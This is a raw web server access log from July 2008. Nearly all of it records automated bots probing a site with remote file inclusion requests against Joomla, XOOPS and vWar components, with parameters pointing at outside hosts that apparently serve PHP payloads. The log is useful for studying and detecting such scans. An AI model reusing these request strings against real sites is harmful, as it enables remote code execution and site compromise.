80.67.17.87 - - [06/Jul/2008:18:47:43 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.17.87 - - [06/Jul/2008:18:47:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:47:55 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:48:09 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:48:11 -0700] "GET /logs/access_080407.log HTTP/1.1" 200 1691587 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
216.14.127.59 - - [06/Jul/2008:18:48:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.14.127.59 - - [06/Jul/2008:18:48:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:48:31 -0700] "GET /logs/access_070916.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:48:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:48:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:48:31 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 8092367 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:48:37 -0700] "GET /logs/access_071105.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:48:42 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1913849 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:48:58 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.101 - - [06/Jul/2008:18:49:16 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
65.55.212.18 - - [06/Jul/2008:18:49:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:49:20 -0700] "GET /logs/access_071029.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:49:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
62.116.167.49 - - [06/Jul/2008:18:49:24 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.116.167.49 - - [06/Jul/2008:18:49:25 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:49:27 -0700] "GET /logs/access_071217.log HTTP/1.1" 200 7639025 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
77.249.65.213 - - [06/Jul/2008:18:49:28 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.249.65.213 - - [06/Jul/2008:18:49:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.249.65.213 - - [06/Jul/2008:18:49:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.203.245.7 - - [06/Jul/2008:18:49:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.203.245.7 - - [06/Jul/2008:18:49:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.55.212.18 - - [06/Jul/2008:18:49:42 -0700] "GET /logs/access_080210.log HTTP/1.0" 200 8452625 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
203.146.170.160 - - [06/Jul/2008:18:49:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.146.170.160 - - [06/Jul/2008:18:49:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:50:09 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
89.186.1.54 - - [06/Jul/2008:18:50:13 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:50:38 -0700] "GET /logs/access_071029.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:50:39 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:50:39 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.77.11.177 - - [06/Jul/2008:18:50:43 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.77.11.177 - - [06/Jul/2008:18:50:47 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.77.11.177 - - [06/Jul/2008:18:50:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:51:14 -0700] "GET /logs//main.php?sayfa=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:51:14 -0700] "GET //main.php?sayfa=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
82.77.11.177 - - [06/Jul/2008:18:51:43 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.77.11.177 - - [06/Jul/2008:18:51:45 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:51:52 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 8968261 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
65.98.8.4 - - [06/Jul/2008:18:52:58 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.8.4 - - [06/Jul/2008:18:52:58 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.49.13.112 - - [06/Jul/2008:18:52:59 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.49.13.112 - - [06/Jul/2008:18:53:04 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.49.13.112 - - [06/Jul/2008:18:53:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.49.13.112 - - [06/Jul/2008:18:53:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:53:51 -0700] "GET /logs/access_071224.log/index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:53:51 -0700] "GET /index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:53:51 -0700] "GET /logs/index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.203.245.7 - - [06/Jul/2008:18:53:58 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:54:02 -0700] "GET /index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:54:02 -0700] "GET /logs/access_071231.log/index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:54:02 -0700] "GET /logs/index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
77.249.65.213 - - [06/Jul/2008:18:55:19 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.249.65.213 - - [06/Jul/2008:18:55:23 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.106.98.71 - - [06/Jul/2008:18:55:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.98.71 - - [06/Jul/2008:18:55:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:55:40 -0700] "GET /logs/access_080331.log HTTP/1.1" 200 9302416 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:55:49 -0700] "GET /logs/access_080310.log/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:55:49 -0700] "GET /errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:55:49 -0700] "GET /logs/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:55:53 -0700] "GET //components/com_flyspray/startdown.php?file=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:56:11 -0700] "GET /logs/access.log/index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:56:11 -0700] "GET /logs/index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:56:11 -0700] "GET /index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:56:49 -0700] "GET /logs/access_080526.log/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.146.170.160 - - [06/Jul/2008:18:56:57 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.146.170.160 - - [06/Jul/2008:18:56:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.146.170.160 - - [06/Jul/2008:18:57:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:57:35 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:57:35 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:57:36 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
69.94.56.40 - - [06/Jul/2008:18:57:41 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
69.94.56.40 - - [06/Jul/2008:18:57:41 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:58:09 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:58:09 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [06/Jul/2008:18:58:10 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.149.200.13 - - [06/Jul/2008:18:58:39 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.149.200.13 - - [06/Jul/2008:18:58:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.149.200.13 - - [06/Jul/2008:18:58:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.149.200.13 - - [06/Jul/2008:18:58:45 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.249.65.213 - - [06/Jul/2008:18:59:00 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:18:59:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:18:59:31 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:18:59:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:18:59:42 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:00:10 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:00:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:00:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.77.11.177 - - [06/Jul/2008:19:00:16 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:00:43 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:00:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:00:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.108.66.101 - - [06/Jul/2008:19:01:08 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
89.108.66.101 - - [06/Jul/2008:19:01:08 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
89.108.66.101 - - [06/Jul/2008:19:01:08 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
125.161.237.251 - - [06/Jul/2008:19:01:09 -0700] "HEAD /logs/access_070820.log HTTP/1.1" 200 0 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:01:15 -0700] "GET /logs/access_071224.log/index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:01:15 -0700] "GET /index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:01:15 -0700] "GET /logs/index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
125.161.237.251 - - [06/Jul/2008:19:01:18 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 262144 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:01:32 -0700] "GET /logs/access_071112.log/index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
89.108.66.101 - - [06/Jul/2008:19:01:46 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.101 - - [06/Jul/2008:19:01:47 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.101 - - [06/Jul/2008:19:01:48 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
125.161.237.251 - - [06/Jul/2008:19:01:54 -0700] "HEAD /logs/access_070820.log HTTP/1.1" 200 0 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.summitcircle.com"
87.106.101.24 - - [06/Jul/2008:19:01:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.101.24 - - [06/Jul/2008:19:01:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
125.161.237.251 - - [06/Jul/2008:19:01:58 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 262144 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:04:44 -0700] "GET /logs/access_071112.log/index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:04:44 -0700] "GET /logs/index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:04:44 -0700] "GET /index.php?Language=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:19:05:53 -0700] "GET /logs/access.log/content.php?inc=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.146.170.160 - - [06/Jul/2008:19:07:52 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
